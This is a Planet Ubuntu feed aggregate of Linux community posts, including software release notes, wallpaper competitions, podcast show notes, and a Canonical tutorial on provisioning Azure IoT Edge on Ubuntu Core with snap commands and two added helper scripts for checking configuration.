<pre class="wp-block-code"><code class="language-bash" lang="bash">cdk bootstrap aws://account_number/region --profile profile_name</code></pre>Ubuntu developershttp://planet.ubuntu.com/Koodo Readerhttps://sparkylinux.org/?p=124242024-03-24T11:49:13+00:00<p><img alt="koodo reader" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" height="210" src="https://sparkylinux.org/wp-content/uploads/2024/03/koodo.webp" width="350" /></p><p>There is a new application available for Sparkers: Koodo Reader</p>
<p><strong>What is Koodo Reader?</strong></p>
<blockquote><p>A modern ebook manager and reader with sync and backup capacities for Windows, macOS, Linux and Web. It’s free and open-source.
</p></blockquote>
<p><strong>Features</strong></p>
<p>– Format support: EPUB (.epub), PDF (.pdf), DRM-free Mobipocket (.mobi) and Kindle (.azw3, .azw), Plain text (.txt), FictionBook (.fb2), Comic book archive (.cbr, .cbz, .cbt, .cb7), Rich text (.md, .docx), Hyper Text (.html, .xml, .xhtml, .mhtml, .htm, .htm)<br />
– Platform support: Windows, macOS, Linux and Web<br />
– Save your data to OneDrive, Google Drive, Dropbox, FTP, SFTP, WebDAV, S3, S3 Compatible<br />
– Customize the source folder and synchronize among multiple devices using OneDrive, iCloud, Dropbox, etc.<br />
– Single-column, two-column, or continuous scrolling layouts<br />
– Text-to-speech, translation, dictionary, touch screen support, batch import<br />
– Add bookmarks, notes, highlights to your books<br />
– Adjust font size, font family, line-spacing, paragraph spacing, background color, text color, margins, and brightness<br />
– Night mode and theme color<br />
– Text highlight, underline, boldness, italics and shadow</p>
<p><strong>Installation (Sparky 7 & 8 amd64, arm64, i386):</strong></p>
<p><code>sudo apt update<br />
sudo apt install koodo-reader</code></p>
<p>License: GNU AGPL 3.0<br />
Web: github.com/koodo-reader/koodo-reader<br />
<br /> </p>
<div class="simplesocialbuttons simplesocial-flat-button-border simplesocialbuttons_inline simplesocialbuttons-align-left post-12424 post simplesocialbuttons-inline-no-animation">
<button class="simplesocial-fb-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Facebook </span> </button>
<button class="simplesocial-twt-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Twitter</span> </button>
<button class="simplesocial-reddit-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Reddit</span> </button>
<button class="simplesocial-tumblr-share" rel="nofollow" target="_blank"><span class="simplesocialtxt">Tumblr</span> </button>
</div>pavroohttps://sparkylinux.orgVyOS Project March 2024 Updatehttps://blog.vyos.io/vyos-project-march-2024-update2024-03-22T17:08:46+00:00<div class="hs-featured-image-wrapper">
<a class="hs-featured-image-link" href="https://blog.vyos.io/vyos-project-march-2024-update" title=""> <img alt="march 2024 update" class="hs-featured-image" src="https://blog.vyos.io/hubfs/VyOS%20Project%20march%202024.png" style="width: auto !important; float: left; margin: 0 15px 15px 0;" /> </a>
</div>
<p>Hello, Community!<br />While VyOS 1.4/Sagitta has taken its final shape, and we are working to smoothen any remaining sharp edges (especially in migration scripts), the upcoming 1.5/Circinus branch is the new frontier where we can go wild and experiment freely. Safe features from the current branch are still backported to 1.4/Sagitta.</p>
<p>Still, we already have non-backportable features — such as improvements to the new DHCP server implementation based on Kea rather than the now-obsolete ISC DHCP server.<br />In the last month, there were quite a few improvements, including the ability to set multiple peer addresses for unicast VRRP (a feature by our new core team member Natalia Solomko), segment routing support for static IPv6 routes, support for SSH public keys in the PKI subsystem, and more.</p>
Erkin Batu Altunbase.altunbas@vyos.ioKubuntu General News: Kubuntu Wallpaper 24.04 – Call for Submissionshttps://kubuntu.org/?p=51682024-03-22T08:19:03+00:00<p>We are excited to announce a call for submissions for the official desktop wallpaper of Kubuntu 24.04! This is a fantastic opportunity for artists, designers, and Kubuntu enthusiasts to showcase their talent and contribute to the visual identity of the upcoming Kubuntu release.</p>
<h3>What We’re Looking For</h3>
<p>We are in search of unique, inspiring, and beautiful wallpapers that reflect the spirit of Kubuntu and its community. Your design should captivate users with its creativity, while also embodying the essence of Kubuntu’s commitment to freedom, elegance, and technical excellence.</p>
<h3>Submission Guidelines</h3>
<p><strong>Resolution:</strong> Submissions must be at least 3840×2160 pixels to ensure high quality on all displays.</p>
<p><strong>Format:</strong> JPEG or PNG format is preferred.</p>
<p><strong>Original Work:</strong> Your submission must be your original work and not include any copyrighted material unless you have permission to use it.</p>
<p><strong>Theme:</strong> While we encourage creativity, your design should be suitable for a wide audience and align with the values and aesthetics of the Kubuntu community.</p>
<h3>How to Submit</h3>
<p>Please send your wallpaper submissions to Rick Timmis of the Kubuntu Council, via one of:</p>
<ul><li>Telegram: <a href="https://t.me/Rick_Timmis" rel="noreferrer noopener" target="_blank">https://t.me/Rick_Timmis</a></li><li>Matrix: @rick-timmis:ubuntu.com</li><li>Mastodon: @<a href="mailto:RickTimmis@mastodon.social">RickTimmis@mastodon.social</a></li><li>Email: <a href="mailto:rick-timmis@kubuntu.org">rick-timmis@kubuntu.org</a></li><li>IRC: irc.libera.chat #kubuntu-devel @rick-timmis.</li></ul>
<h3>Deadline</h3>
<p>The deadline for submissions is March 31, 2024. We will review all submissions and select the design(s) to be included as part of the Kubuntu 24.04 release. The selected artist(s) will receive credit in the release notes and across our social media platforms, showcasing your contribution to users worldwide.</p>
<h3>Let Your Creativity Shine</h3>
<p>This is your chance to leave a mark on the Kubuntu community and be a part of the journey towards an exciting new release. We can’t wait to see your submissions and the diverse interpretations of what Kubuntu represents to you.</p>
<p>Embrace this opportunity to let your creativity shine and help make Kubuntu 24.04 the most visually stunning release yet. Good luck to all participants!</p>Ubuntu developershttp://planet.ubuntu.com/UCS@school 5.0 v5 Releasedhttps://www.univention.de/?p=686372024-03-22T07:31:06+00:00<section class="wpb-content-wrapper"><div class="univention-row default univention-row--padding-45 color-scheme-default"><div class="univention-container"><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
<div class="wpb_text_column wpb_content_element ">
<div class="wpb_wrapper">
<p>UCS@school 5.0 v5, the fifth patch level release of UCS@school 5.0, is now available, containing a number of fixes and improvements, some of which I would like to highlight.<span id="more-68637"></span></p>
<h2>Importer now accepts different encodings as input format</h2>
<p>The UCS@school Importer now officially accepts input files encoded not only in UTF-8 but also alternatively in UTF-16, both Little Endian and Big Endian. Additionally, user guidance has been improved in case an unsupported encoding is used.</p>
<h2>Detection of the output format of class list exports optimized</h2>
<p>Class list exports are available in two formats. To optimize compatibility with different programs for further processing, the browser now communicates how the chosen format is structured, allowing subsequent programs to utilize this information.</p>
<h2>Improved robustness of computer imports</h2>
<p>Previously, there could be issues during computer imports if the subnet mask was accidentally specified as an IP address or if multiple MAC addresses were provided. Overall, the robustness for these cases has been improved such that faulty inputs are now detected and reported before import, and handling multiple MAC addresses later proceeds smoothly.</p>
<h2>Release Notes</h2>
<p>A comprehensive list of all the new features and changes can be found in our changelog. If you have any suggestions or improvement ideas, we welcome your feedback here on the blog or on <a href="https://help.univention.com/">help.univention.com</a>.</p>
</div>
</div>
</div></div></div></div></div></div>
</section><p>The post <a href="https://www.univention.com/blog-en/2024/03/ucsschool-5-0-v5/">UCS@school 5.0 v5 Released</a> first appeared on <a href="https://www.univention.com">Univention</a>.</p>Jan-Luca Kiokhttps://www.univention.com/news/blog-en/Ubuntu Studio: Wallpaper Competition Winners 24.04 LTShttps://ubuntustudio.org/?p=27272024-03-21T21:22:45+00:00<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2729" height="360" src="https://ubuntustudio.org/wp-content/uploads/2024/03/0cd3/wallpaperwinners.jpg" width="640" /></figure></div>
<h2>A Crowning Achievement</h2>
<p>24.04 LTS will represent the eighth Long-Term Support release of Ubuntu Studio and its 32nd release. For this release, we wanted to make sure we got some great representation from the community in terms of wallpaper, and while there weren’t as many entries as our previous competition, we were blown away in terms of quality. While not every wallpaper could be included, all of the entries were solid, and narrowing it down to the best of the best was very difficult.</p>
<h2>Revealing The Default</h2>
<p>Our long-time art lead, Eylul Dogruel, worked diligently on making a quality textured default wallpaper that not only works well for traditional horizontal screens, but for vertical screens as well without losing quality. We have two variations: one with our logo, and one with the mascot that will be rotated-out for the next four releases.</p>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2730" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/671a/2404default.jpg" width="480" /></figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2731" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/729f/2204noble.jpg" width="480" /></figure></div>
<h2>Now to Crown the Winners!</h2>
<p>As stated, this was a very difficult decision, but we would like to congratulate the winners of the competition! The full-quality images will be included in Ubuntu Studio 24.04 LTS and are already in our daily builds of Noble Numbat.</p>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2732" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/f2c7/94a551c06b7e5ae6dc12d93da44469008a56ce92.jpeg" width="480" />Interference by Uday Nakade</figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2733" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/e3f3/866871a44e782dbed2854b0c8c6ed9a483d0cc6b.jpeg" width="480" />Glass Wave 1 Light by Alastair Temple</figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2734" height="320" src="https://ubuntustudio.org/wp-content/uploads/2024/03/d6f7/151b1b72cd90c4db2ae77f83708be1d2457fd67d.jpeg" width="480" />Bee 2 by Liber Dovat</figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2735" height="267" src="https://ubuntustudio.org/wp-content/uploads/2024/03/ebbf/8c96b2dc893761e2e69f3d8f381dc60493689e64.jpeg" width="480" />Brauneck Sunrise by Uday Nakade</figure></div>
<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img alt="" class="wp-image-2736" height="270" src="https://ubuntustudio.org/wp-content/uploads/2024/03/c0ad/8d34c315efd8bfd4f3558953b25a6cbd277e91c7.jpeg" width="480" />Banaue by Jean-Daniel Bancal</figure></div>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Getting Started with Azure IoT Edge on Ubuntu Corehttps://ubuntu.com//blog/getting-started-with-azure-iot-edge-on-ubuntu-core2024-03-21T10:35:00+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="268" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_512,h_268/https://ubuntu.com/wp-content/uploads/c1b9/get-started-azure-snap.png" width="512" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Introduction</h2>
<p>Earlier this month/week, we announced that you can now benefit from the combined power of Ubuntu Core and Azure IoT Edge to bring the computation, storage, and AI capabilities of the cloud closer to the edge of the network. Azure IoT Edge is a device-focused runtime that enables you to deploy, run, and monitor containerised Linux workloads. Ubuntu Core is a version of Ubuntu that has been specially optimised for IoT and embedded systems. The combination of the two is ideal for those looking for reduced latency, lower bandwidth, and more efficient data processing. </p>
<p>This tutorial helps you get started using an Ubuntu Core device and managing it from the Azure IoT Hub. Azure IoT Hub is the cloud platform which allows you to connect to, configure and deploy Edge workloads directly to your device.</p>
<h2 class="wp-block-heading">Setting up Ubuntu Core</h2>
<p>Ubuntu Core is a minimal, immutable version of Ubuntu focused on providing a reliable and secure platform for connected devices. </p>
<h3 class="wp-block-heading">Create an Ubuntu SSO Account</h3>
<p>Before you can create an Ubuntu Core device, you need to ensure you can connect to it after initial configuration. This will require an Ubuntu SSO account and an SSH keypair. </p>
<p>You can skip this step if you already have an account. If you do not have an SSO account, you can sign up for one here:</p>
<p><a href="https://login.ubuntu.com/">https://login.ubuntu.com/</a></p>
<h3 class="wp-block-heading">SSH Keys</h3>
<p>In order to authenticate yourself when trying to connect to your Ubuntu Core device, you will need to upload a public SSH key to your SSO account. This will then be automatically downloaded to the Core device during initial configuration.</p>
<p>To generate and upload an SSH key pair, please follow the steps detailed in the link below:</p>
<p><a href="https://ubuntu.com/core/docs/connect-with-ssh">Connect to Ubuntu Core with SSH</a></p>
<p>You may also want to come back to this information once you have configured your Core device in the next stage.</p>
<h3 class="wp-block-heading">Obtaining and configuring an Ubuntu Core Device</h3>
<p>For the next stage in the process you will need an IoT device running Ubuntu Core. This can either be a physical device, such as a Raspberry Pi, or a virtual device on your desktop. </p>
<p>You can find all the available Ubuntu Core images, ready to download at: <a href="https://ubuntu.com/certified/iot">https://ubuntu.com/certified/iot</a> </p>
<p>To set up a virtual device, you can use QEMU to emulate your desired hardware. Please follow these instructions to complete this phase:</p>
<p><a href="https://ubuntu.com/core/docs/testing-with-qemu">Testing Ubuntu Core with QEMU</a></p>
<p>Independently of which option you chose, you should now have a fully working Ubuntu Core device that you can connect to via SSH. You are now ready to provision it for Microsoft Azure.</p>
<h3 class="wp-block-heading">Installing Azure IoT Edge Snaps</h3>
<p>Having created and connected to your Ubuntu Core device, the next step is to install the Azure snaps.</p>
<p>Microsoft provides four snaps for your Ubuntu Core device: </p>
<ul>
<li>The Identity snap authenticates your device with the Azure cloud.</li>
<li>The Device Agent snap ensures your device is up-to-date. </li>
<li>The Edge snap manages your cloud-deployed workloads on the device. </li>
<li>The Delivery Optimization agent manages downloads of payloads from the Azure cloud.</li>
</ul>
<p>In addition, Azure’s workloads are distributed as Docker containers and you therefore need to install the Docker Snap to run these.</p>
<p>All five snaps can be installed from your SSH terminal using the following commands:</p>
<pre class="wp-block-code"><code>snap install azure-iot-identity
snap install azure-iot-edge
snap install deviceupdate-agent
snap install deliveryoptimization-agent
snap install docker</code></pre>
<p>Note: if you are being asked to use <strong><em>sudo</em></strong> to run snap install, you may need to authenticate yourself with the snap store using <strong><em>sudo snap login &lt;email address&gt;</em></strong>. This will then allow you to perform all snap commands without root privileges.</p>
<h3 class="wp-block-heading">Wiring up slots and plugs</h3>
<p>By default, <a href="https://discourse.ubuntu.com/t/snaps-in-ubuntu-core/19730">snaps</a> are dependency-free, untrusted, and strictly confined, so once installed they must be connected to other snaps and system resources using interfaces. Each snap has a selection of plugs and slots that either request or provide certain access. For production deployments, they can be configured to connect automatically to reduce the provisioning workload, but to get started you may need to manually configure some of them to ensure they have all the permissions they need.</p>
<p>If installing the snaps from the global snap store, most interfaces will already be connected for you, however there are a few you may need to manually configure.</p>
<p>From an SSH terminal, you can check which interfaces are already connected using the following commands for each snap:</p>
<pre class="wp-block-code"><code>undefined
snap connections azure-iot-identity
snap connections azure-iot-edge
snap connections deviceupdate-agent
snap connections deliveryoptimization</code></pre>
<p>For each snap you will be presented with a list of the interfaces. If the slot is empty, it may need connecting. For example, if you get the following response from snap connections <em>azure-iot-identity</em>:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="241" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1210,h_241/https://ubuntu.com/wp-content/uploads/642d/image.png" width="1210" />
</noscript>
</div>
</figure>
<p>We can see that some interfaces have been connected, but the identity snap cannot access hostname information, log information, mount information, system information or the TPM. We need to connect them manually, which we can do from our terminal:</p>
<pre class="wp-block-code"><code>snap connect azure-iot-identity:log-observe
snap connect azure-iot-identity:mount-observe
snap connect azure-iot-identity:system-observe
snap connect azure-iot-identity:tpm
snap connect azure-iot-identity:hostname-control</code></pre>
<p>The format of this command is <strong><em>snap connect &lt;plug&gt; &lt;slot&gt;</em></strong>, but as we are connecting to snapd system slots we do not need to specify them.</p>
<h3 class="wp-block-heading"><strong>IoT Edge</strong></h3>
<p>For the IoT Edge agent, we can go through a similar process but this time we also want to connect from one snap (Edge agent) to another (Docker). The following commands should cover all unconnected interfaces.</p>
<pre class="wp-block-code"><code># Connect to logging and grant permission to query system info
snap connect azure-iot-edge:log-observe
snap connect azure-iot-edge:mount-observe
snap connect azure-iot-edge:system-observe
snap connect azure-iot-edge:hostname-control
# Connect IoT Edge to Docker
snap connect azure-iot-edge:docker docker:docker-daemon</code></pre>
<h3 class="wp-block-heading"><strong>IoT Device agent</strong></h3>
<pre class="wp-block-code"><code># Grant permission to manage accounts and query hardware info
snap connect deviceupdate-agent:account-control
snap connect deviceupdate-agent:hardware-observe
# Connect to snapd
snap connect deviceupdate-agent:snapd-control
# Connect to the other Azure snaps
snap connect deviceupdate-agent:identity-service azure-iot-identity:identity-service</code></pre>
<p>With all the interfaces now connected, we are ready to move on to connecting to the cloud.</p>
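<p>Because strict confinement only helps when each plug is attached to the slot you intended, it is worth auditing the wiring once the commands above have run. The script below is an added example, not part of the original guide or of the snaps themselves: it parses <em>snap connections</em> output and reports any plug from this guide that is still unconnected or attached to an unexpected slot. The function names and the sample listing are constructed for illustration.</p>

```shell
#!/bin/sh
# Added example (not from the original guide): audit snap interface wiring.

# Connections this guide makes by hand, as "<snap>:<plug> <expected slot>".
# "system" means a snapd system slot, which `snap connections` shows as ":<name>".
required_connections() {
    cat <<'EOF'
azure-iot-identity:log-observe system
azure-iot-identity:mount-observe system
azure-iot-identity:system-observe system
azure-iot-identity:tpm system
azure-iot-identity:hostname-control system
azure-iot-edge:log-observe system
azure-iot-edge:mount-observe system
azure-iot-edge:system-observe system
azure-iot-edge:hostname-control system
azure-iot-edge:docker docker:docker-daemon
deviceupdate-agent:account-control system
deviceupdate-agent:hardware-observe system
deviceupdate-agent:snapd-control system
deviceupdate-agent:identity-service azure-iot-identity:identity-service
EOF
}

# Constructed sample of `snap connections azure-iot-identity` output,
# with the hostname-control and tpm plugs still unconnected.
sample_connections() {
    cat <<'EOF'
Interface         Plug                                 Slot             Notes
hostname-control  azure-iot-identity:hostname-control  -                -
log-observe       azure-iot-identity:log-observe       :log-observe     manual
mount-observe     azure-iot-identity:mount-observe     :mount-observe   manual
network           azure-iot-identity:network           :network         -
system-observe    azure-iot-identity:system-observe    :system-observe  manual
tpm               azure-iot-identity:tpm               -                -
EOF
}

# Usage: snap connections <snap> | audit_connections [snap]
# Prints one line per problem and returns 1 if any was found.
audit_connections() {
    # Keep "plug slot" pairs; skip the header row of each listing.
    conns=$(awk '$1 != "Interface" && NF >= 3 { print $2, $3 }')
    rc=0
    while read -r plug want; do
        [ -n "$plug" ] || continue
        got=$(printf '%s\n' "$conns" |
              awk -v p="$plug" '$1 == p && !seen { print $2; seen = 1 }')
        case "$got" in
            ''|-) echo "UNCONNECTED $plug"; rc=1 ;;
            :*)   [ "$want" = system ] || { echo "WRONG-SLOT $plug $got"; rc=1; } ;;
            *)    [ "$want" = "$got" ] || { echo "WRONG-SLOT $plug $got"; rc=1; } ;;
        esac
    done <<EOF
$(required_connections | awk -v s="${1:-}" 's == "" || index($1, s ":") == 1')
EOF
    return $rc
}

# On a device, audit all three snaps in one pass:
#   for s in azure-iot-identity azure-iot-edge deviceupdate-agent; do
#       snap connections "$s"
#   done | audit_connections
# Demo on the constructed sample:
sample_connections | audit_connections azure-iot-identity ||
    echo "connect the plugs listed above with 'snap connect'"
```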
<h2 class="wp-block-heading">Setting up your Azure IoT Edge account</h2>
<p>For the next step, you need to move to the cloud and the Azure IoT Edge portal. If you already have an Azure account, you can sign in here: </p>
<p><a href="https://portal.azure.com/">Azure Portal</a></p>
<p>If you do not have an account, you can sign up for an account here:</p>
<p><a href="https://azure.microsoft.com/en-gb/products/iot-edge">Azure IoT Edge</a></p>
<p>You will be given the option to either create a free account (which includes a time-limited, preview credit) or a paid account with access to premium services. Both Azure IoT Hub and Azure IoT Edge are free services that can be used without charge provided you stay within Azure’s usage limitations. More information can be found <a href="https://azure.microsoft.com/en-us/pricing/free-services">here</a>.</p>
<p>Once you have access to your Azure account and the Azure Portal, you will need to create your IoT Hub. From the Azure services section of the portal, click “More services” and select “IoT Hub” from the “Internet of Things” section.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="503" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_783,h_503/https://ubuntu.com/wp-content/uploads/69c2/image.png" width="783" />
</noscript>
</div>
</figure>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="684" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_778,h_684/https://ubuntu.com/wp-content/uploads/ce5b/image.png" width="778" />
</noscript>
</div>
</figure>
<p>Once in your IoT Hub, you need to create a Hub. Click the Create button and fill in the details. Once happy, click the ‘Create’ button.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="655" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_781,h_655/https://ubuntu.com/wp-content/uploads/e13c/image-2.png" width="781" />
</noscript>
</div>
</figure>
<p>After a brief pause, your Hub will have been deployed and we can now see it in the IoT Hub portal.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="361" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1169,h_361/https://ubuntu.com/wp-content/uploads/31d1/image.png" width="1169" />
</noscript>
</div>
</figure>
<p>Select your Hub and, from the menu on the right hand side of the screen, select Devices. </p>
<p>Click “Add Device”, choose a name for your device and select the “IoT Edge Device” checkbox. Choose any other settings you desire and click “Save”.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="716" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_702,h_716/https://ubuntu.com/wp-content/uploads/28cc/image-1.png" width="702" />
</noscript>
</div>
</figure>
<p>Again after a slight pause, your device will have been created and added to your Hub. </p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="421" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1166,h_421/https://ubuntu.com/wp-content/uploads/715a/image.png" width="1166" />
</noscript>
</div>
</figure>
<p>Select your device from your Hub and you will be presented with the various options and information. For the moment, we are just interested in the “Primary connection string” as we will need this to provision the actual device. </p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="640" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1150,h_640/https://ubuntu.com/wp-content/uploads/4d9a/image-1.png" width="1150" />
</noscript>
</div>
</figure>
<p>You can view the connection string by clicking on the small eye icon or copy it to your clipboard by clicking the icon to the right. </p>
<h2 class="wp-block-heading">Provisioning your Device</h2>
<p>In order for your Core device to connect to your newly created IoT Hub, it needs to be configured with the connection string we have just obtained.</p>
<p>Returning to the SSH terminal of your Core device, create a file called <em>config.toml</em>.</p>
<p>At this point it may be useful to install a text editor onto your Core device. Follow the steps below to install the strictly confined nano snap and connect it to your home directory, then open the config.toml file for editing.</p>
<pre class="wp-block-code"><code>sudo snap install nano-strict
snap connect nano-strict:home :home
nano-strict config.toml</code></pre>
<p>Copy and paste the following into your text editor but replace the connection string with the one you obtained from your IoT Hub Device. </p>
<pre class="wp-block-code"><code>## Manual provisioning with connection string
#
[provisioning]
source = "manual"
connection_string = "HostName=snaphub-free.azure-devices.net;DeviceId=iotvm;SharedAccessKey=XXXXXXXXX"</code></pre>
<p>Apply that configuration file to your Azure Snap using the following command:</p>
<pre class="wp-block-code"><code>sudo snap set azure-iot-edge raw-config="$(cat config.toml)"</code></pre>
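<p>The config.toml file carries the device's SharedAccessKey, so it is worth checking both its contents and its file permissions before applying it. The script below is an added example, not part of the original guide or of the Azure snaps; the function names are made up for illustration, and <em>stat -c</em> assumes GNU coreutils.</p>

```shell
#!/bin/sh
# Added example (not from the original guide): pre-flight check for config.toml.

# Print the value of connection_string from the given TOML file.
connection_string() {
    sed -n 's/^[[:space:]]*connection_string[[:space:]]*=[[:space:]]*"\(.*\)"[[:space:]]*$/\1/p' "$1" |
        head -n 1
}

# Print one field of a "Key=value;Key=value" connection string.
# Only the "Key=" prefix is stripped, so base64 padding ("=") in the key survives.
cs_field() {  # $1 = connection string, $2 = field name
    printf '%s\n' "$1" | tr ';' '\n' | sed -n "s/^$2=//p" | head -n 1
}

# Usage: check_provisioning_config config.toml
# Returns 0 if the file is ready to apply, 1 on any finding, 2 if it is missing.
check_provisioning_config() {
    f=$1
    rc=0
    [ -f "$f" ] || { echo "ERROR no such file: $f"; return 2; }

    grep -Eq '^[[:space:]]*source[[:space:]]*=[[:space:]]*"manual"' "$f" ||
        { echo 'ERROR [provisioning] source is not "manual"'; rc=1; }

    cs=$(connection_string "$f")
    for key in HostName DeviceId SharedAccessKey; do
        [ -n "$(cs_field "$cs" "$key")" ] ||
            { echo "ERROR connection_string lacks $key"; rc=1; }
    done

    # The guide's sample uses a run of X characters as a stand-in for the key.
    if cs_field "$cs" SharedAccessKey | grep -Eq '^X+$'; then
        echo "ERROR SharedAccessKey is still the placeholder"
        rc=1
    fi

    # The file holds a secret: no group or other permission bits should be set.
    mode=$(stat -c '%a' "$f")
    case "$mode" in
        *00) ;;
        *) echo "WARN $f has mode $mode; restrict it with chmod 600"; rc=1 ;;
    esac
    return $rc
}

# Demo: the guide's own sample, placeholder key included, in a private temp file.
demo=$(mktemp)
cat > "$demo" <<'EOF'
[provisioning]
source = "manual"
connection_string = "HostName=snaphub-free.azure-devices.net;DeviceId=iotvm;SharedAccessKey=XXXXXXXXX"
EOF
check_provisioning_config "$demo" || echo "config.toml is not ready to apply"
rm -f "$demo"
```

<p>After <em>snap set</em> has applied the configuration, the copy of config.toml in the home directory still contains the key.</p>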
<p>It is also possible to authenticate your device to the Azure IoT Hub using X.509 certificates. For information on how to use that method, please refer to <a href="https://learn.microsoft.com/en-us/azure/iot-edge/how-to-provision-single-device-linux-x509?view=iotedge-1.4&tabs=azure-portal%2Cubuntu">this</a> documentation from Microsoft. </p>
<h2 class="wp-block-heading">Your Device in Azure IoT Hub</h2>
<p>Once configured, your device will download some containers to allow it to run Azure IoT Edge workloads. This may take some time depending on your network connection speed but once complete your device will be visible from your Azure portal and you can configure it with additional workloads from there as well as explore all the offerings Azure has for your device. </p>
<p><a href="https://learn.microsoft.com/en-us/azure/iot-edge/how-to-deploy-modules-portal?view=iotedge-1.4">Deploying Modules to your Device</a></p>
<h2 class="wp-block-heading">Next Steps</h2>
<p>You should now have a fully working and configured Ubuntu Core device which can be remotely managed with the Azure IoT Hub. From here you can explore the features Azure IoT has to offer. </p>
<p>If you want to try and deploy your first module to your Edge device, <a href="https://learn.microsoft.com/en-gb/azure/iot-edge/quickstart-linux?view=iotedge-1.4#deploy-a-module">this tutorial</a> from Microsoft shows you how you can deploy a sensing module that will send simulated telemetry data from your device to the cloud. It is the perfect place to get started with your Ubuntu Core Azure IoT Edge device. </p>
<p>For more information on what you can do with Azure IoT, please refer to the Microsoft documentation.</p>
<p><a href="https://learn.microsoft.com/en-us/azure/iot-edge/?view=iotedge-1.4">Azure IoT Edge documentation | Microsoft Learn</a> </p>
<p>For more information on the power and capabilities of Ubuntu Core please refer to <a href="https://ubuntu.com/core">Ubuntu Core</a>.</p>Ubuntu developershttp://planet.ubuntu.com/Podcast Ubuntu Portugal: E291 Santo Seppukuhttps://media.blubrry.com/ubuntupt/archive.org/download/pup-e291/e291.mp32024-03-21T00:00:00+00:00<p>Watashitachi no komyuniti wa kyōryokudesu! Diogo made a mistake and his ancestors demand that he restore the podcast's honour. Now this country is really going places, now that PC Guia has released a <em>pen drive</em> with GNU-Linux distributions to educate the people! ANSOL is gaining more and more ground in the <em>media</em>, its general assembly was full of applause, parades and little flags, and free software marches towards the tomorrows that sing! Meanwhile, Miguel doesn't like banks; Canonical continues to have problems with cryptocurrency apps; Firefox is full of nice little things, and Ubuntu 24.04 LTS is on its way with beautiful wallpapers!</p>
<p>You know the drill: listen, subscribe and share!</p>
<ul>
<li>
<p><a href="https://discourse.ubuntu.com/t/noble-numbat-24-04-wallpaper-competition/42300/179">https://discourse.ubuntu.com/t/noble-numbat-24-04-wallpaper-competition/42300/179</a></p>
</li>
<li>
<p><a href="https://ubuntu.com/blog/the-coronation-of-a-new-mascot-noble-numbat">https://ubuntu.com/blog/the-coronation-of-a-new-mascot-noble-numbat</a></p>
</li>
<li>
<p><a href="https://ansol.org/eventos/2024-03-24-open-knowledge-braga-2024/">https://ansol.org/eventos/2024-03-24-open-knowledge-braga-2024/</a></p>
</li>
<li>
<p><a href="https://web.archive.org/web/20240319195823/https%3A%2F%2Fansol.org%2Feventos%2F2024-03-24-open-knowledge-braga-2024%2F">https://web.archive.org/web/20240319195823/https%3A%2F%2Fansol.org%2Feventos%2F2024-03-24-open-knowledge-braga-2024%2F</a></p>
</li>
<li>
<p><a href="https://pt.wikimedia.org/wiki/Open_Knowledge_Braga_2024">https://pt.wikimedia.org/wiki/Open_Knowledge_Braga_2024</a></p>
</li>
<li>
<p><a href="https://web.archive.org/web/20240319200112/https://pt.wikimedia.org/wiki/Open_Knowledge_Braga_2024">https://web.archive.org/web/20240319200112/https://pt.wikimedia.org/wiki/Open_Knowledge_Braga_2024</a></p>
</li>
<li>
<p><a href="https://ansol.org/eventos/2024-04-05-wikicon-portugal-2024/">https://ansol.org/eventos/2024-04-05-wikicon-portugal-2024/</a></p>
</li>
<li>
<p><a href="https://web.archive.org/web/20240319202559/https://ansol.org/eventos/2024-04-05-wikicon-portugal-2024/">https://web.archive.org/web/20240319202559/https://ansol.org/eventos/2024-04-05-wikicon-portugal-2024/</a></p>
</li>
<li>
<p><a href="https://wikimedia.pt/2024/02/28/wikicon-portugal-2024/">https://wikimedia.pt/2024/02/28/wikicon-portugal-2024/</a></p>
</li>
<li>
